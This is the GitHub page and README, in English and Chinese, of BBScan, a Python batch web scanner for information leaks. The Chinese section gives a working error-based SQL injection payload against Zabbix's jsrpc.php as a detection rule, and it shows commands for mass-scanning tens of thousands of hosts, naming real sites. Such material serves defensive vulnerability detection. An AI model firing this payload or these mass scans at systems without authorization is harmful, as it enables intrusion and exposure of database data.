A tiny Batch weB vulnerability Scanner
Python
Latest commit 97d504c Dec 12, 2016 @lijiejie committed on GitHub Merge pull request #7 from u1l/master
支持markdown格式的扫描报告
Permalink
Failed to load latest commit information.
crawler_logs BBscan 1.1 is now here Nov 8, 2016
lib Update report.py Dec 11, 2016
report init commit Nov 13, 2015
rules BBscan 1.1 is now here Nov 8, 2016
targets init commit Nov 13, 2015
.gitignore add title Nov 29, 2016
BBScan.py Update BBScan.py Dec 11, 2016
LICENSE Initial commit Nov 13, 2015
README.md Update README.md Dec 11, 2016
requirements.txt init commit Nov 13, 2015

README.md

BBScan 1.1.0

BBScan is a tiny Batch weB vulnerability Scanner.

Requirements

  • BeautifulSoup4==4.3.2
  • py2-ipaddress==3.4.1

You can install required packages with pip

pip install -r requirements.txt

Usage

usage: BBScan.py [options]

* A tiny Batch weB vulnerability Scanner. *
By LiJieJie (http://www.lijiejie.com)

optional arguments:
  -h, --help            show this help message and exit
  --host HOST [HOST2 HOST3 ...]
                        Scan several hosts from command line
  -f TargetFile         Load targets from TargetFile
  -d TargetDirectory    Load all *.txt files from TargetDirectory
  --crawler TargetDirectory
                        Load all *.log crawler file from TargetDirectory
  --full-scan           Process all sub directories.
  -n, --no-crawl        No crawling, sub folders will not be processed.
  -nn, --no-check404    No HTTP 404 existence check
  -p PROCESS            Num of processes running concurrently, 10 by default
  -t THREADS            Num of scan threads for each scan process, 8 by default
  --network MASK        Scan all Target/MASK hosts,
                        should be an int between 24 and 31
  --timeout Timeout     Max scan minutes for each website, 20 by default
  --browser             View report with browser after scan finished.
  -md                   Save the scan report as markdown format
  -v                    show program's version number and exit

1. Scan several hosts from command line

python BBScan.py  --host www.a.com www.b.com --browser

2. Scan www.target.com and all the other IPs under www.target.com/28

python BBScan.py  --host www.target.com --network 28 --browser

3. Load newline delimetered targets from file and scan

python BBScan.py -f wandoujia.com.txt

4. Load all targets from Directory(*.txt file only) and scan

python BBScan.py -d targets/

5. Load crawler logs from Directory(*.log file only) and scan

python BBScan.py --crawler crawler_logs/

crawler log files should be formarted first:

        . GET http://www.iqiyi.com/ HTTP/1.1^^^200
        . POST http://www.pps.tv/login.php HTTP/1.1^^^user=admin&passwd=admin^^^200

使用说明

BBScan是一个迷你的信息泄漏批量扫描脚本。 可以通过文本批量导入主机或URL,以换行符分割。

--crawler 参数是v1.1新增的,可以导入爬虫日志发起扫描。 日志的格式,我们约定如下:

        Request Line + 三个尖括号 + [POST请求body] + 三个尖括号 + HTTP状态码

示例如下:

        . GET http://www.iqiyi.com/ HTTP/1.1^^^200
        . POST http://www.pps.tv/login.php HTTP/1.1^^^user=admin&passwd=admin^^^200

--full-scan 处理所有的子文件夹,比如 http://www.target.com/aa/bb/cc/, /aa/bb/cc/ /aa/bb/ /aa/ 三个path都将被扫描

-n, --no-crawl 不从首页抓取新的URL

-nn, --no-check404 不检查状态码404是否存在,不保存404页面的大小进行后续比对

web漏洞应急中的简单应用

以批量扫描 Zabbix SQL注入为例,在一个txt文件中写入规则:

/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim%20estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi%20story.php&profileIdx=web.item.graph&profileIdx2=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20user())x%20from%20information_schema.character_sets%20group%20by%20x)y)&updateProfil%20e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=%2017&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&%20mark_color=1    {tag="Duplicate entry"}  {status=200}  {type="text/plain"}

/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&stamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim%20estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi%20story.php&profileIdx=web.item.graph&profileIdx2=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20user())x%20from%20information_schema.character_sets%20group%20by%20x)y)&updateProfil%20e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=%2017&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&%20mark_color=1          {tag="Duplicate entry"}  {status=200}  {type="text/plain"}

把所有HTTP like的服务写入 iqiyi.http.txt:

不要抓首页
不要检测404
并发2个线程、 50个进程

可以比较迅速地扫完几万个域名和IP地址:

BBScan.py --no-crawl --no-check404 -t2 -p50 -f iqiyi.http.txt

该插件是从内部扫描器中抽离出来的,感谢 Jekkay Hu<34538980[at]qq.com> ,欢迎提交有用的新规则